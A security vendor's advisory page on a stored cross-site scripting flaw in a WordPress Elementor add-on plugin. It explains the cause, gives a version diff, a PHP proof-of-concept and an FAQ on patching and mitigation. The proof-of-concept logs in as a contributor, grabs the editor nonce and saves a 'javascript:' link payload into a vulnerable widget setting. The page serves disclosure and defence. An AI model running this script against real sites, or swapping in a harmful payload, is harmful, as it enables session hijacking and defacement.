Atomic Edge analysis of CVE-2026-3034:
The vulnerability is a stored cross-site scripting (XSS) flaw in the OoohBoi Steroids for Elementor WordPress plugin. The root cause is a lack of proper output escaping and URL validation for user-supplied input in the widget controls ‘_ob_spacerat_link’, ‘_ob_bbad_link’, and ‘_ob_teleporter_link’. The plugin accepts these URL parameters from authenticated Contributor+ users via the Elementor editor and stores them in the post metadata without sanitization. The stored values are then rendered directly into anchor tag href attributes on the frontend without escaping, allowing JavaScript execution when a user clicks the injected link. The exploitation method requires an authenticated attacker with at least Contributor-level access. The attacker crafts a malicious payload within the Elementor editor for a widget utilizing the vulnerable controls, such as ‘javascript:alert(document.domain)’. The payload is saved when the post is updated. The patch in version 2.1.25 likely adds proper URL sanitization or validation, such as using esc_url() or esc_url_raw(), before storing or outputting the link parameters. The version number and tested Elementor versions were also updated. If exploited, this vulnerability allows attackers to inject arbitrary JavaScript into pages, which can lead to session hijacking, malicious redirects, or defacement.
CVE-2026-3034: OoohBoi Steroids for Elementor <= 2.1.24 – Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple URL Controls (ooohboi-steroids-for-elementor)
CVE-2026-3034
2.1.24
2.1.25
Analysis Overview
Differential between vulnerable and patched code
--- a/ooohboi-steroids-for-elementor/ooohboi-steroids.php
+++ b/ooohboi-steroids-for-elementor/ooohboi-steroids.php
@@ -2,21 +2,21 @@
/**
* Plugin Name: OoohBoi Steroids for Elementor
* Description: An awesome set of tools/options/settings that extend Elementor default/existing widgets and elements. It keeps the editor tidy, saves valuable resources and improves the workflow.
- * Version: 2.1.24
+ * Version: 2.1.25
* Author: OoohBoi
* Author URI: https://www.youtube.com/c/OoohBoi
* Text Domain: ooohboi-steroids
* License: GPLv3
* License URI: http://www.gnu.org/licenses/gpl-3.0
- * Elementor tested up to: 3.33
- * Elementor Pro tested up to: 3.33
+ * Elementor tested up to: 3.34
+ * Elementor Pro tested up to: 3.34
*/
use ElementorCoreSettingsManager as SettingsManager;
defined( 'ABSPATH' ) || die(); // Exit if accessed directly.
-define( 'OoohBoi_VERSION', '2.1.24' );
+define( 'OoohBoi_VERSION', '2.1.25' );
define( 'OoohBoi_FILE', __FILE__ );
define( 'OoohBoi_URL', plugins_url( '/', __FILE__ ) );
define( 'OoohBoi_PATH', plugin_dir_path( __FILE__ ) );Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3034 - OoohBoi Steroids for Elementor <= 2.1.24 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple URL Controls
<?php
$target_url = 'http://example.com/wp-admin/admin-ajax.php';
$username = 'contributor';
$password = 'password';
$nonce = '';
$post_id = 1;
// Step 1: Authenticate and get nonce for Elementor editor
$login_url = 'http://example.com/wp-login.php';
$ch = curl_init($login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['log' => $username, 'pwd' => $password, 'wp-submit' => 'Log In']));
curl_setopt($ch, CURLOPT_POST, true);
$response = curl_exec($ch);
curl_close($ch);
// Step 2: Fetch Elementor editor nonce (simplified - actual nonce fetch may vary)
$ch = curl_init('http://example.com/wp-admin/post.php?post=' . $post_id . '&action=elementor');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);
preg_match('/"nonce":"([a-f0-9]+)"/', $response, $matches);
if (!empty($matches[1])) $nonce = $matches[1];
curl_close($ch);
// Step 3: Exploit - Save post with malicious link in a vulnerable control via Elementor AJAX
// This is a conceptual payload. The exact AJAX endpoint and data structure depend on Elementor's internal API.
// The vulnerable parameters are '_ob_spacerat_link', '_ob_bbad_link', '_ob_teleporter_link'.
$payload = 'javascript:alert(document.domain)';
$data = [
'action' => 'elementor_ajax',
'nonce' => $nonce,
'actions' => json_encode([
[
'action' => 'save_builder',
'data' => [
'post_id' => $post_id,
'elements' => [
[
'id' => 'some_element_id',
'settings' => [
'_ob_spacerat_link' => $payload
]
]
]
]
]
])
];
$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_POST, true);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
?>Frequently Asked Questions
What is CVE-2026-3034?
Understanding the vulnerabilityCVE-2026-3034 is a stored cross-site scripting (XSS) vulnerability found in the OoohBoi Steroids for Elementor plugin for WordPress. It allows authenticated users with Contributor-level access and above to inject malicious scripts via specific URL parameters.
How does the vulnerability work?
Mechanism of exploitationThe vulnerability arises from a lack of proper output escaping and validation of user-supplied input in the plugin’s URL parameters. When an attacker provides a malicious URL, it is stored in the post metadata and later rendered on the frontend, allowing the execution of arbitrary JavaScript.
Who is affected by this vulnerability?
Identifying vulnerable usersAny WordPress site using the OoohBoi Steroids for Elementor plugin version 2.1.24 or earlier is affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Verifying plugin versionCheck the version of the OoohBoi Steroids for Elementor plugin installed on your WordPress site. If it is version 2.1.24 or earlier, your site is vulnerable to this XSS flaw.
How can I fix this vulnerability?
Updating the pluginThe vulnerability has been patched in version 2.1.25 of the plugin. To fix the issue, update the OoohBoi Steroids for Elementor plugin to the latest version as soon as possible.
What does the CVSS score of 6.4 mean?
Understanding severity levelsA CVSS score of 6.4 indicates a medium severity level. This suggests that while the vulnerability poses a significant risk, it requires an authenticated user to exploit it, which may limit its immediate impact.
What are the practical risks of this vulnerability?
Potential consequencesExploitation of this vulnerability can lead to session hijacking, malicious redirects, or defacement of web pages. Attackers can inject scripts that execute when users interact with affected elements, potentially compromising user data.
What is the proof of concept for this vulnerability?
Demonstrating the exploitThe proof of concept illustrates how an authenticated user can exploit the vulnerability by crafting a malicious URL in the Elementor editor. This demonstrates the steps required to authenticate and inject a script that would execute on the frontend.
How can I mitigate the risk if I cannot update immediately?
Temporary measuresIf immediate updates cannot be performed, consider restricting access to the Elementor editor for users with Contributor-level permissions or higher. Additionally, monitor your site for any suspicious activity related to this vulnerability.
What should I do if I suspect exploitation?
Responding to potential attacksIf you suspect that your site has been exploited, conduct a thorough security audit. Check for unauthorized changes, review user permissions, and consider restoring from a clean backup if necessary.
Where can I find more information about this vulnerability?
Further resourcesDetailed information about CVE-2026-3034 can be found on the National Vulnerability Database or security advisories from WordPress security organizations. These resources provide insights into the vulnerability and recommended actions.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
